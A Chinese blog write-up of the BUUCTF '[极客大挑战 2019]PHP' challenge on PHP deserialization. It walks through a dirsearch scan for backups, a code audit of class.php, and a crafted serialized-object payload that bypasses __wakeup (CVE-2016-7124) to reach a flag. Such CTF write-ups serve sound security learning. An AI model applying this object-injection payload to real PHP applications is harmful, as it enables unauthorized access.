【CTF】buuctf web(三)——PHP序列化与反序列化

最新推荐文章于 2024-04-09 20:18:30 发布
最新推荐文章于 2024-04-09 20:18:30 发布
阅读量1.7k 收藏 11
点赞数 2
分类专栏: buuctf 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/119334169
版权

知识点

  • 后台目录扫描工具dirsearch

  • 魔术方法wakeup()绕过:当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)

  • 常见的备份文件后缀名.git .svn .swp .~ .bak .bash_history .rar .zip .7z .txt .html .tar.gz .old .temp

  • private:private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度

    public属性被序列化的时候属性名还是原来的属性名,没有任何改变
    protected属性被序列化的时候属性名会变成%00*%00属性名,长度跟随属性名长度而改变
    private属性被序列化的时候属性名会变成%00类名%00属性名,长度跟随属性名长度而改变

[极客大挑战 2019]PHP

题目类型:序列化与反序列化

在这里插入图片描述
这儿提示备份网站,用dirsearch扫一下后台目录
输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php
在这里插入图片描述
找到www.zip,访问一下在这里插入图片描述
跳出弹窗,点击下载

在这里插入图片描述
发现有flag.php目录
在这里插入图片描述

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

无用信息
查看index.php源码,
在这里插入图片描述
发现包含class.php文件,采用get传参select,还有个php反序列化函数unserialize()

查看另一个文件class.php
在这里插入图片描述
查看源码
在这里插入图片描述

发现有输出flag的条件,接下来代码审计

<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
	//创建对象时触发
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
	//使用unserialize时触发
    function __wakeup(){
        $this->username = 'guest';
    }
	//对象被销毁时触发
	//如果password=100,username=admin,在执行__destruct()的时候可以获得flag
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();       
        }
    }
}
?>

通过反序列化来执行destruct函数,如果password=100,username=admin,可以获得flag

构造序列化

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>

在这里插入图片描述

接着执行反序列化,执行之前限制性wakeup函数,但是__wakeup函数会修改username的值,所以一个想办法绕过wakeup
绕过方法:当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)

  • 方法一:用序列化加%00
    private:属性被序列化的时候属性名会变成%00类名%00属性名,长度跟随属性名长度而改变。加%00的目的就是用于替代\0

    O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

    构造payload:/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
    在这里插入图片描述

  • 方法二:直接url编码

    <?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));
var_dump(urlencode(serialize($a)));//进行url编码,防止%00对应的不可打印字符在复制时丢失
?>

    在这里插入图片描述

吃_早餐
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 914
真的很详细
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
php反序列化-BUUCTF刷题记录
cike_y
11-30 786
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
CTF php反序列化总结
m0_53567065的博客
11-17 4283
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
最新发布
m0_73935461的博客
04-09 1963
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
(wp)ctfweb-buu中php反序列化
qq_51862722的博客
07-12 836
(wp)ctfweb-buu中php反序列化 我的blog,欢迎来玩 前面整理过php反序列化的知识点。 1.[极客大挑战 2019]PHP 进入页面,根据提示,考虑备份导致源码泄露。 于是用扫描工具(ctfwscan)进行目录扫描,发现备份文件可以成功访问,如图 然后下载下来,打开,有五个文件: 尝试flag.php后不对,审计class.php和index.php,找到了可反序列化点 因为包含了class.php文件,所以审计class.php class中没有调用类,根据index中代码,.
ctfshow web入门 反序列化 263
m0_64815693的博客
04-08 1605
ctfshow web入门 反序列化 263
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
php代码-ctf payload 第九题 反序列化 do you know robot
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
BUUCTF-[极客大挑战 2019]PHP1
Monica的博客
09-27 3643
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2182
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
buuctf php
qq_74020399的博客
04-07 126
buuctf php(反序列化)
CTFSHOW 反序列化
热门推荐
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
CTF题型 php反序列化进阶(1) php原生类 例题和总结
qq_39947980的博客
03-14 1213
题目环境:https://github.com/D0g3-Lab/i-SOON_CTF_2023/tree/main/web/easy_unserialize。(通过echo触发SplFileObject中的**__toString()**方法)复现环境:https://www.nssctf.cn/problem/3723。一般题目会用 foreach 遍历读取每一行输出flag内容。存在__toString,可以获取符合要求的第一个文件名。仅读取一行内容(完整内容配合php://filter)
寒假buu刷题记录 序列化反序列化、XSS注入、UPLOAD-LABS文件上传
qq_62984336的博客
03-02 2623
做题总结 这个假期看了很多师傅的wp,有一些贴在总结里了,希望对大家也有帮助。(如有冒犯请联系我删除) 序列化反序列化总结 pop链构造POP链的构造_一个打渔的的博客K6uQ5H7^ff(R-CSDN博客_pop链 序列化反序列化序列化反序列化的详解_tree_ifconfig的博客-CSDN博客_序列化反序列化 简述序列化反序列化 - 寒江独钓人 - 博客园 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 inte
BUUCTF - Web - PHP
1tachi的博客
11-27 450
敏感文件泄露 访问www.zip 解压 class.php中是PHP源码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = .
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化反序列化
m0_55854679的博客
08-23 1916
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
BUUCTF——phpweb
weixin_45864041的博客
04-17 606
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHPWeb应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值